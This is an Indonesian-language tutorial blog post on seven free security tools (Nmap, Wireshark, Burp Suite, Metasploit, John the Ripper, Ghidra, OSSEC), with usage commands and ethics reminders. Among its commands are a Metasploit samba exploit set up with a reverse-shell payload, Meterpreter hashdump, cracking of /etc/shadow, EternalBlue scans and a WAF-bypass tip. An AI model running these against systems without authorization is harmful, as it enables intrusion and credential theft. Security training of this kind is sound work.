7 Tools Keamanan Siber Gratis yang Wajib Kamu Kuasai
Lo tau nggak sih, dulu waktu gue baru mulai di dunia cybersecurity (sekitar tahun 2002), tools yang tersedia itu bisa diitung pake jari. Nggak kayak sekarang, di mana setiap minggu ada tools baru bermunculan. Tapi dari ratusan tools yang ada, ada beberapa yang udah teruji waktu, konsisten, dan jadi standar industri.
Di artikel ini gue bakal ngebahas 7 tools keamanan siber yang gratis, powerful, dan wajib lo kuasai. Gue nggak cuma sebutin nama—gue bakal kasih konteks, cara instalasi, dan contoh penggunaan dasarnya.
1. Nmap — Network Mapper
Kategori: Network scanning & discovery
Nmap adalah tools pertama yang gue install di setiap mesin baru. Ini network scanner standar de facto di industri.
Cara Install
sudo apt install nmap
Penggunaan Dasar
nmap 192.168.1.1 # Single host
nmap 192.168.1.0/24 # Subnet
nmap -p 22,80,443 192.168.1.1 # Port spesifik
nmap -p- 192.168.1.1 # Semua 65535 port
nmap -sV 192.168.1.1 # Service version
nmap -O 192.168.1.1 # OS detection
nmap -A 192.168.1.1 # Aggressive scan
nmap -F 192.168.1.1 # Fast scan (top 100 ports)
sudo nmap -sS 192.168.1.1 # Stealth SYN scan
nmap -oA result 192.168.1.1 # Output all formats
Nmap Scripting Engine (NSE)
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.1
nmap --script ssl-enum-ciphers -p 443 example.com
nmap --script http-enum -p 80 example.com
nmap --script safe 192.168.1.1 # Semua script "safe"
Kapan dipake: Mapping jaringan, inventory asset, troubleshooting, security assessment.
Tip: Jangan sembarangan scan jaringan yang bukan milik lo. Di beberapa negara, unauthorized scanning ilegal.
2. Wireshark — Network Protocol Analyzer
Kategori: Packet analysis & network forensics
Wireshark adalah “mikroskop” untuk ngeliat apa yang terjadi di kabel jaringan.
Cara Install
sudo apt install wireshark
Penggunaan Dasar
Buka Wireshark, pilih interface, klik Start. Gunakan display filter:
http # Hanya HTTP
tcp.port == 443 # Hanya HTTPS
ip.addr == 192.168.1.1 # Dari/ke IP spesifik
dns # Hanya DNS queries
!arp # Kecualikan ARP
tcp.flags.syn == 1 # Hanya SYN packets
http.request.method == "POST" # Hanya POST requests
Use Case
- Troubleshooting koneksi lambat
- Deteksi malware C2 communication
- Analisis serangan network
- Debugging aplikasi
- Belajar protokol jaringan
Kapan dipake: Forensik jaringan, troubleshooting, belajar network.
Tip: Wireshark bisa decrypt HTTPS kalau lo punya SSLKEYLOGFILE.
3. Burp Suite Community Edition
Kategori: Web application security testing
Platform integrated untuk pengujian keamanan aplikasi web.
Fitur Community Edition
- Proxy: Intercept dan modifikasi HTTP/HTTPS traffic
- Repeater: Kirim request berulang dengan modifikasi
- Decoder: Encode/decode data
- Intruder (terbatas): Automated attack untuk fuzzing
Setup
- Konfigurasi browser untuk proxy Burp (127.0.0.1:8080)
- Install Burp’s CA certificate untuk intercept HTTPS
- Browsing seperti biasa, semua request lewat Burp
- Kirim request menarik ke Repeater
- Gunakan Intruder untuk fuzzing
Kapan dipake: Web app security testing. Wajib untuk bug bounty.
Tip: Pelajari Burp Extensions (BApp Store) seperti Active Scan++ dan Autorize.
4. Metasploit Framework (Ethical Use Only)
Kategori: Penetration testing framework
DISCLAIMER: Gunakan hanya untuk tujuan etis pada sistem yang lo punya izin tertulis.
Konsep Dasar
- Exploit: Kode untuk mengeksploitasi vulnerability
- Payload: Kode yang dijalankan setelah eksploitasi
- Auxiliary: Module untuk scanning dan fuzzing
- Post: Module post-exploitation
- Encoder: Untuk menyamarkan payload
Penggunaan Dasar
msfconsole
search samba
use exploit/multi/samba/usermap_script
show options
set RHOSTS 192.168.1.100
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.1.50
exploit
Meterpreter
sysinfo # Info sistem
getuid # User saat ini
ps # List proses
migrate PID # Pindah ke proses lain
hashdump # Dump password hash
download/upload # Transfer file
Kapan dipake: Penetration testing dan vulnerability validation.
5. John the Ripper
Kategori: Password cracking & security auditing
John the Ripper udah ada sejak 1996 dan tetap jadi standard password cracker.
Penggunaan Dasar
sudo apt install john
# Crack shadow file
john /etc/shadow
# Wordlist attack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Dengan rules
john --wordlist=rockyou.txt --rules hashes.txt
# Lihat hasil
john --show hashes.txt
# Crack ZIP
zip2john protected.zip > zip.hash
john zip.hash
Kapan dipake: Security audit, recovery password yang sah.
6. Ghidra — NSA’s Reverse Engineering Tool
Kategori: Reverse engineering & malware analysis
Ghidra dikembangkan NSA dan dirilis open source 2019. Sangat powerful untuk membongkar binary executable.
Kemampuan
- Disassembly: Lihat instruksi assembly
- Decompilation: Decompile ke C code (sangat powerful)
- Graphing: Function call graph, control flow
- Scripting: Python/Java automation
- Plugin support
- Debugger
Kapan dipake: Malware analysis, vulnerability research, memahami proprietary software.
7. OSSEC — Host-based Intrusion Detection System
Kategori: Intrusion detection & file integrity monitoring
OSSEC melakukan log analysis, file integrity monitoring, rootkit detection, dan active response.
Arsitektur
Client-server: OSSEC Server mengumpulkan alert, OSSEC Agent diinstal di server yang dimonitor.
Kemampuan
- Log analysis dan korelasi
- File integrity monitoring (mendeteksi perubahan file)
- Rootkit detection
- Active response (otomatis blokir IP)
Kapan dipake: Compliance (PCI DSS, ISO 27001), deteksi intrusion.
Tip: Cek Wazuh, fork OSSEC dengan UI modern dan integrasi ELK stack.
Membangun Toolkit Sendiri
Network Security: Nmap, Wireshark, lalu iptables/nftables
Web App Security: Burp Suite, Nmap (recon)
Penetration Testing: Nmap, Metasploit, John the Ripper, Burp Suite
Malware Analysis: Ghidra, Wireshark
Blue Team / Defense: Wireshark, OSSEC/Wazuh, Nmap
Ethical Reminder
Semua tools di atas adalah double-edged sword. GUNAKAN HANYA UNTUK TUJUAN ETIS:
- Setup lab sendiri untuk belajar
- Ikut program bug bounty legal
- Ambil sertifikasi (eJPT, OSCP)
- Bergabung dengan komunitas ethical hacking
JANGAN PERNAH scan atau exploit sistem tanpa izin.
Kesimpulan
Tools adalah perpanjangan skill lo. Pahami tools dengan baik, bikin lab, dan mulai eksplorasi.
Lebih Dalam Tentang Nmap
Satu hal yang sering dilupain pemula: Nmap bukan cuma tools scanning port. Nmap punya kemampuan yang jauh lebih dalam. Misalnya, Nmap scripting engine (NSE) punya lebih dari 600 script yang bisa dipake untuk vulnerability detection, exploitation, discovery, brute force, dan masih banyak. Beberapa script favorit gue:
# Cek SMB vulnerability (EternalBlue)
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.0/24
# Enumerasi HTTP
nmap --script http-enum,http-headers,http-methods -p 80,443 target.com
# Deteksi WAF
nmap --script http-waf-detect -p 80,443 target.com
# Cek SSL/TLS
nmap --script ssl-enum-ciphers -p 443 target.com
# Deteksi malware beacon
nmap --script http-malware-host -p 80 target.com
Output Nmap juga bisa disimpen dalam berbagai format: XML (untuk diparse oleh tools lain), greppable (buat processing dengan grep/awk), dan normal. Kalau lo serius jadi pentester, pelajari cara nge-parse Nmap XML output dengan Python — ini akan sangat berguna buat automasi.
Lebih Dalam Tentang Burp Suite
Burp Suite Community Edition emang terbatas, tapi jangan remehin. Dengan kreativitas, lo bisa melakukan banyak hal. Beberapa tips:
Burp Macros: Lo bisa bikin macro untuk otomatisasi sequence request yang kompleks, kayak login -> ambil session token -> jalankan scan. Ini berguna buat aplikasi yang perlu authenticated session.
Collaborator (Pro only, tapi…): Kalau lo pakai Burp Pro, Burp Collaborator adalah fitur game-changing untuk deteksi blind vulnerabilities (blind SSRF, blind XXE, out-of-band RCE). Tapi ada alternatif gratis kayak interactsh dari ProjectDiscovery.
Match & Replace: Fitur ini bisa auto-modify request di proxy. Misalnya, ganti User-Agent untuk bypass WAF, atau tambahin header custom untuk semua request.
Scope: JANGAN LUPA SET SCOPE! Tanpa scope, Burp akan intercept semua traffic—termasuk traffic dari aplikasi lain di background, update checker, dll. Set scope ke target domain aja.
Sumber Belajar
Tools hanyalah alat. Yang lebih penting adalah methodology. Gue sangat merekomendasikan:
- TryHackMe: Platform belajar interaktif, banyak room tentang tools spesifik
- HackTheBox Academy: Lebih terstruktur, tapi sebagian berbayar
- PortSwigger Web Security Academy: Gratis, lengkap, dari Burp Suite creator
- YouTube: IppSec, The Cyber Mentor, NetworkChuck
Memilih Tools yang Tepat untuk Situasi yang Tepat
Sebagai pemula, godaan terbesar adalah pengen install semua tools dan nyobain semuanya sekaligus. Ini pendekatan yang salah. Lebih baik kuasai 2-3 tools dulu secara mendalam daripada punya 50 tools tapi cuma tau dasarnya.
Untuk Bug Bounty / Web Pentest: Burp Suite + browser + subdomain enumeration tools (subfinder, assetfinder). Jangan langsung lompat ke Metasploit. 80% bug bounty findings adalah web vulnerabilities yang bisa ditemukan dengan Burp Suite dan ketelitian.
Untuk Network Pentest: Nmap untuk initial recon, Metasploit untuk exploitation, dan jika perlu, John the Ripper/Hashcat untuk password cracking. Tapi ingat: methodology lebih penting daripada tools. Tanpa methodology yang sistematis, lo cuma akan asal scan dan jalan di tempat.
Untuk Blue Team / Defense: Wireshark untuk analisis trafik, OSSEC/Wazuh untuk HIDS, ditambah ELK stack (Elasticsearch, Logstash, Kibana) untuk log aggregation. Di dunia defense, kemampuan membaca log dan mengkorelasi event adalah skill paling berharga.
Untuk Malware Analysis: Ghidra untuk reverse engineering statis, Wireshark untuk analisis network behavior malware, dan sandbox environment yang aman (VM terisolasi tanpa network). Jangan pernah analisis malware di mesin host lo!
Pipeline Tools yang Saling Melengkapi
Tools ini nggak berdiri sendiri. Mereka membentuk pipeline:
- Nmap → Discovery: host apa yang hidup? port apa yang terbuka?
- Burp Suite → Web Exploration: endpoint apa yang ada di aplikasi web?
- Metasploit → Exploitation: kalau nemu vulnerability, exploit untuk validasi
- Wireshark → Forensics: kalau exploit gagal atau aneh, analisis trafik untuk debug
- John the Ripper → Post-exploit: kalau dapet hash, crack untuk privilege escalation
- Ghidra → Research: kalau nemu binary mencurigakan, reverse engineer
- OSSEC → Defense: setelah tau cara attacker masuk, setup rules untuk deteksi
Ini adalah flow yang banyak pentester dan security engineer pake setiap hari. Tools berbeda untuk fase berbeda.
Kesimpulan Akhir
Gue udah pake semua tools ini selama bertahun-tahun, dan satu hal yang gue pelajari: tools datang dan pergi, tapi skill fundamental tetap. Jangan jadi “script kiddie” yang cuma bisa klik-klik tools tanpa ngerti cara kerjanya. Pahami CONCEPT di balik setiap tool.
Misalnya, jangan cuma tau “nmap bisa scan port.” Pahami gimana TCP three-way handshake bekerja, gimana SYN scan beda dari TCP connect scan, dan gimana OS fingerprinting bekerja. Ini yang membedakan profesional dari amatir.
Mulai dari satu tools, kuasai secara mendalam, lalu lanjut ke tools berikutnya. Rome wasn’t built in a day, dan cybersecurity expert juga nggak dibangun dalam semalam. But with consistent effort, lo will get there.
Penulis tersertifikasi OSCP, CISSP, dan telah menggunakan semua tools ini dalam pekerjaan profesional.